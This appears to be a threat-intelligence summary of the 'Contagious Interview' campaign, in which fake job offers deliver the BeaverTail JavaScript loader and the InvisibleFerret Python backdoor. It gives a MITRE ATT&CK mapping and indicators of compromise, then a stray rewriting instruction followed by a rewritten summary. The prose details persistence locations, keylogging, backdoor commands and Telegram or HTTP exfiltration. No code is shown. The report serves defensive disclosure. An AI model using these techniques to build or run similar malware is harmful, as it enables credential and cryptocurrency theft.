Keypoints
- Attackers use fake job postings and code challenges to deliver a malicious JavaScript (BeaverTail) that boots a Python backdoor (InvisibleFerret).
- BeaverTail uses javascript-obfuscator and dynamic loading (fetch + eval) to evade detection and retrieve additional code from attacker servers.
- InvisibleFerret runs on multiple OSes, performs keylogging, browser and wallet theft, targeted file discovery, and configurable exfiltration.
- Exfiltration channels include HTTP /uploads endpoints and Telegram uploads; FTP was used historically but has been removed in newer builds.
- InvisibleFerret supports OS-specific persistence (Windows batch in Startup, macOS LaunchAgent plist, Linux .desktop entry) and AnyDesk-related commands for remote access.
- Campaign delivered via malicious NPM packages, Windows installers, and macOS application bundles, leading to widespread infections and source-code/cryptocurrency theft.
MITRE Techniques
- [T1566.003] Phishing: Spearphishing via Service – The attacker initiates contact and lures victims through social media or job platforms. (‘The threat actor connected with the victim through social media or job application platforms.’)
- [T1059.007] Command and Scripting Interpreter: JavaScript – BeaverTail executes malicious JavaScript as the initial infection stage. (‘The malicious JavaScript, known as BeaverTail, is used during the initial stage of infection.’)
- [T1059.006] Command and Scripting Interpreter: Python – InvisibleFerret is a Python backdoor used in intermediate and final stages to perform data collection and exfiltration. (‘The malicious Python script, known as InvisibleFerret, is used during the intermediate and final stage of infection.’)
- [T1204.002] User Execution: Malicious File – Victims are tricked into executing compromised NPM packages or installers disguised as legitimate applications. (‘The threat actor tricked the victim into executing compromised NPM packages or installation files.’)
- [T1027.013] Obfuscated Files or Information: Encrypted/Encoded File – Both BeaverTail and InvisibleFerret are heavily obfuscated to hinder analysis. (‘BeaverTail and InvisibleFerret are heavily obfuscated.’)
- [T1555.003] Credentials from Password Stores: Credentials from Web Browsers – The malware targets browser-stored credentials and cryptocurrency wallet data. (‘One of the primary objectives of the malware is to steal sensitive data stored in the victim’s browser, including cryptocurrency wallets.’)
- [T1083] File and Directory Discovery – InvisibleFerret searches specific files and directories to identify valuable targets and exfiltrate sensitive files. (‘Using InvisibleFerret, the threat actor searches specific files to verify the victim and exfiltrate sensitive files.’)
- [T1082] System Information Discovery – Malicious scripts collect and send general system information from compromised hosts. (‘Malicious scripts used in the Contagious Interview campaign are responsible for sending general information from the victim.’)
- [T1560.001] Archive Collected Data: Archive via Utility – Some InvisibleFerret variants compress and encrypt stolen data (7z/zip/RAR) before exfiltration. (‘Specific version of InvisibleFerret that sends stolen data using the RAR utility.’)
- [T1005] Data from Local System – The backdoor searches and uploads interesting local files such as source code and documents. (‘Search interesting files from the victim host and exfiltrate.’)
- [T1071.001] Application Layer Protocol: Web Protocols – InvisibleFerret uploads stolen data over HTTP using endpoints like /uploads. (‘Through InvisibleFerret, sends sensitive data over the HTTP protocol.’)
- [T1071.002] Application Layer Protocol: File Transfer Protocols – Earlier versions used FTP for file uploads (historical behavior). (‘Through InvisibleFerret, sends sensitive data over the FTP protocol.’)
- [T1041] Exfiltration Over C2 Channel – Depending on commands, data can be exfiltrated over C2 channels controlled by the attacker. (‘Depending on backdoor commands, exfiltrates stolen data over the C2 channel.’)
Indicators of Compromise
- [GitHub repositories] Campaign IOCs and malicious artifacts – https://github.com/ThreatLabz/iocs/tree/main/contagiousinterview, https://github.com/ThreatLabz/iocs/tree/main/wagemole
- [LinkedIn profiles] Fake recruiter/developer profiles used for targeting – hxxps://www.linkedin[.]com/in/frank-schoneberg-a089832a4/, hxxps://www.linkedin[.]com/in/logan-collins-374404306
- [Endpoint URIs] Payload and exfiltration endpoints used by the actors – /payload, /bow, /uploads
- [File paths & startup artifacts] Persistence and remote-access artifacts observed – C:/Program Files (x86)/AnyDesk/AnyDesk.exe, com.avatar.update.wake.plist (and queue.bat startup script)
- [Malicious script names] Primary payload identifiers observed on victims – BeaverTail (malicious JavaScript), InvisibleFerret (Python backdoor)
Rewrite the entire article focusing only on the key points related to the technical procedure. Exclude unrelated or non-technical information. Present the rewritten version in a maximum of three well-structured paragraphs that improve clarity, flow, and reader engagement. Use fresh, natural wording and vary the sentence structure so it differs from the original, while preserving all essential technical details and the original meaning.
The Contagious Interview infection chain begins with social-engineered job postings that lure developers into executing supplied artifacts—historically a malicious NPM package, but also Windows installers and macOS application bundles. The NPM-delivered JavaScript loader, BeaverTail, is obfuscated with javascript-obfuscator and can dynamically fetch additional code from attacker-controlled servers; in some cases it extracts a cookie field from fetched JSON and executes it via eval to run further malicious payloads. BeaverTail’s primary role is to retrieve and launch a Python backdoor (InvisibleFerret) from endpoints such as /payload and /bow.
InvisibleFerret is a multi-component Python backdoor that establishes persistence tailored per OS (Windows Startup batch, macOS LaunchAgent plist, GNOME .desktop entry for Linux) and spawns a dedicated keylogging thread that monitors active windows and clipboard activity. Its modular command set permits reconnaissance (AP, AQ), targeted data collection (sdira, sdir, sfile, sfind*), and specialized browser/cryptocurrency artifact theft (ssh_zcp, AA, AO), including copying wallet extension data and app-specific directories. Operators can also modify AnyDesk configuration values (AC) and check for AnyDesk installation (Ab) to enable additional remote access.
For exfiltration, InvisibleFerret compresses and encrypts collected artifacts using platform-appropriate libraries (py7zr for .7z on Windows, pyzipper/AES Zip with default password on non-Windows) and can send archives via Telegram (token + chat ID) or directly upload files over HTTP to /uploads; FTP was used historically but removed in later builds. The backdoor also supports archive-via-utility variants (RAR) and flexible C2-driven file upload commands, enabling attackers to selectively exfiltrate source code, images, PDFs, browser-stored credentials, and cryptocurrency wallet data from compromised hosts across Windows, macOS, and Linux environments.